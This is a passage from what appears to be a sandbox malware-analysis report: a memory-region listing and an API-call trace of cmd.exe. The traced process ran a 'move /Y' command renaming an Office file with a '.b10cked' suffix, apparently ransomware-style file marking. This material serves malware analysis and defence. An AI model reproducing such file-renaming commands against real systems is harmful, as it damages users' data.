entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22688 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22689 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22690 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 22691 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22692 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22693 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22694 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22695 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22696 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22838 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22839 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = 
"" Region: id = 22840 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22841 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 22842 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 22843 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22844 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22845 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22846 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22847 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22848 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22849 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = 
mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22850 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22851 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22866 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 22867 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22868 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22869 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 22870 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 22871 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 22872 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 22873 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 22874 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000590000" filename = "" Region: id = 22875 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 349 os_tid = 0x910 [0168.455] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fb1c | out: lpSystemTimeAsFileTime=0x22fb1c*(dwLowDateTime=0x9b8eba60, dwHighDateTime=0x1d440a9)) [0168.455] GetCurrentProcessId () returned 0xdf8 [0168.455] GetCurrentThreadId () returned 0x910 [0168.455] GetTickCount () returned 0x31cb3 [0168.455] QueryPerformanceCounter (in: lpPerformanceCount=0x22fb14 | out: lpPerformanceCount=0x22fb14*=22524450268) returned 1 [0168.456] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0168.456] __set_app_type (_Type=0x1) [0168.456] __p__fmode () returned 0x76b331f4 [0168.456] __p__commode () returned 0x76b331fc [0168.457] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0168.457] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0168.457] GetCurrentThreadId () returned 0x910 [0168.458] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x910) returned 0x38 [0168.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.458] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0168.458] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.489] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.489] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22faac | out: phkResult=0x22faac*=0x0) returned 0x2 [0168.489] VirtualQuery (in: lpAddress=0x22fae3, lpBuffer=0x22fa7c, dwLength=0x1c | out: lpBuffer=0x22fa7c*(BaseAddress=0x22f000, 
AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fa7c, dwLength=0x1c | out: lpBuffer=0x22fa7c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fa7c, dwLength=0x1c | out: lpBuffer=0x22fa7c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fa7c, dwLength=0x1c | out: lpBuffer=0x22fa7c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fa7c, dwLength=0x1c | out: lpBuffer=0x22fa7c*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0168.490] GetConsoleOutputCP () returned 0x1b5 [0168.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.490] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0168.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.491] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0168.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.491] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.492] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.492] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.492] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.492] _get_osfhandle (_FileHandle=0) returned 0x3 
[0168.492] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0168.493] GetEnvironmentStringsW () returned 0x310218* [0168.493] FreeEnvironmentStringsW (penv=0x310218) returned 1 [0168.493] GetEnvironmentStringsW () returned 0x310218* [0168.493] FreeEnvironmentStringsW (penv=0x310218) returned 1 [0168.493] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea1c | out: phkResult=0x22ea1c*=0x40) returned 0x0 [0168.493] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x0, lpData=0x22ea28*=0xa8, lpcbData=0x22ea20*=0x1000) returned 0x2 [0168.493] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x1, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x0, lpData=0x22ea28*=0x1, lpcbData=0x22ea20*=0x1000) returned 0x2 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x0, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x40, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x40, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, 
lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x0, lpData=0x22ea28*=0x40, lpcbData=0x22ea20*=0x1000) returned 0x2 [0168.494] RegCloseKey (hKey=0x40) returned 0x0 [0168.494] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea1c | out: phkResult=0x22ea1c*=0x40) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x0, lpData=0x22ea28*=0x40, lpcbData=0x22ea20*=0x1000) returned 0x2 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x1, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x0, lpData=0x22ea28*=0x1, lpcbData=0x22ea20*=0x1000) returned 0x2 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x0, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x9, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x4, lpData=0x22ea28*=0x9, lpcbData=0x22ea20*=0x4) returned 0x0 [0168.494] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea24, lpData=0x22ea28, 
lpcbData=0x22ea20*=0x1000 | out: lpType=0x22ea24*=0x0, lpData=0x22ea28*=0x9, lpcbData=0x22ea20*=0x1000) returned 0x2 [0168.494] RegCloseKey (hKey=0x40) returned 0x0 [0168.494] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886386 [0168.494] srand (_Seed=0x5b886386) [0168.494] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked\"" [0168.495] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked\"" [0168.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.495] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x311978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0168.495] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0168.496] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0168.496] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.496] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0168.496] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0168.496] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0168.496] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0168.496] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0168.496] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0168.496] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0168.496] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0168.496] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0168.496] GetEnvironmentStringsW () returned 0x312368* [0168.496] FreeEnvironmentStringsW (penv=0x312368) returned 1 [0168.496] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.496] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.496] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0168.496] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0168.496] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0168.496] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0168.496] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0168.496] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0168.496] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0168.496] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0168.496] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f7e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.497] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f7e8, lpFilePart=0x22f7e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f7e4*="Desktop") returned 0x18 [0168.497] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.497] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f564 | out: lpFindFileData=0x22f564) returned 0x3109f8 [0168.497] FindClose (in: hFindFile=0x3109f8 | out: hFindFile=0x3109f8) returned 1 [0168.497] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f564 | out: lpFindFileData=0x22f564) returned 0x3109f8 [0168.497] FindClose (in: hFindFile=0x3109f8 | out: hFindFile=0x3109f8) returned 1 [0168.497] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f564 | out: lpFindFileData=0x22f564) returned 0x3109f8 [0168.497] FindClose (in: hFindFile=0x3109f8 | out: hFindFile=0x3109f8) returned 1 [0168.497] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.497] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0168.497] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0168.497] GetEnvironmentStringsW () returned 0x310218* [0168.498] FreeEnvironmentStringsW (penv=0x310218) returned 1 [0168.498] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.498] GetConsoleOutputCP () returned 0x1b5 [0168.504] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.504] GetUserDefaultLCID () returned 0x409 [0168.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0168.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f928, cchData=128 | out: lpLCData="0") returned 2 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f928, cchData=128 | out: lpLCData="0") returned 2 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f928, cchData=128 | out: lpLCData="1") returned 2 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0168.505] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0168.505] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0168.505] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0168.506] GetConsoleTitleW (in: lpConsoleTitle=0x300938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.507] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.507] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0168.507] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0168.508] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0168.508] _wcsicmp (_String1="move", _String2=")") returned 68 [0168.508] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0168.508] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0168.508] _wcsicmp (_String1="IF", _String2="move") returned -4 [0168.508] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0168.508] _wcsicmp (_String1="REM", _String2="move") returned 5 [0168.508] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0168.513] GetConsoleTitleW (in: lpConsoleTitle=0x22f620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.759] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0168.759] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0168.759] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0168.759] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0168.759] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0168.759] _wcsicmp (_String1="move", _String2="CD") returned 10 [0168.759] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0168.759] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0168.759] _wcsicmp (_String1="move", _String2="REN") returned -5 [0168.759] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0168.759] _wcsicmp (_String1="move", _String2="SET") returned -6 [0168.759] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0168.760] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0168.760] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0168.760] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0168.760] _wcsicmp (_String1="move", _String2="MD") returned 11 [0168.760] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0168.760] _wcsicmp (_String1="move", _String2="RD") returned -5 [0168.760] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0168.760] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0168.760] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0168.760] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0168.760] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0168.760] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0168.760] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0168.760] _wcsicmp (_String1="move", _String2="VER") returned -9 [0168.760] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0168.760] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0168.761] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0168.761] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0168.761] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0168.761] _wcsicmp (_String1="move", _String2="START") returned -6 [0168.761] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0168.761] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0168.761] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0168.765] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.765] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.765] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f3dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f3d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f3d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.766] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0168.766] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0168.766] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0168.766] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.766] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0168.766] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0168.767] _wcsnicmp 
